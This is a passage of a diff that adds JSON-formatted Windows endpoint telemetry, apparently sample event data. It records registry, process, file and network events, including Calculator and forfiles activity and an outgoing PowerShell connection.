"process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883574024420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574024440000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574024490000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredMinSize", + "registry_value": "PreferredMinSize", + "timestamp": 131883574024490000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574024640000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574024830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574024830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574024830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574024940000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574025100000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574025100000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574025410000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\ShowInSwitchers", + "registry_value": "ShowInSwitchers", + "timestamp": 131883574025410000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574025410000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": 
"registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574025410000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574026000000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + 
"process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": 
"Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026280000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026360000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + 
"event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026360000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": 
"C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026480000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026480000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "file", + "file_name": "CALC.EXE-AC08706A.pf", + "file_path": "C:\\Windows\\Prefetch\\CALC.EXE-AC08706A.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574027320000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "FORFILES.EXE-BE58C675.pf", + "file_path": "C:\\Windows\\Prefetch\\FORFILES.EXE-BE58C675.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574027350000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "FORFILES.EXE-BE58C675.pf", + "file_path": "C:\\Windows\\Prefetch\\FORFILES.EXE-BE58C675.pf", + "pid": 
1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574027350000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883574035550000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883574035550000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "destination_address": "151.101.48.133", + "destination_port": "443", + "event_type": "network", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "protocol": "tcp", + "source_address": "192.168.162.134", + "source_port": "50511", + "subtype": "outgoing", + "timestamp": 131883574030630000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": 
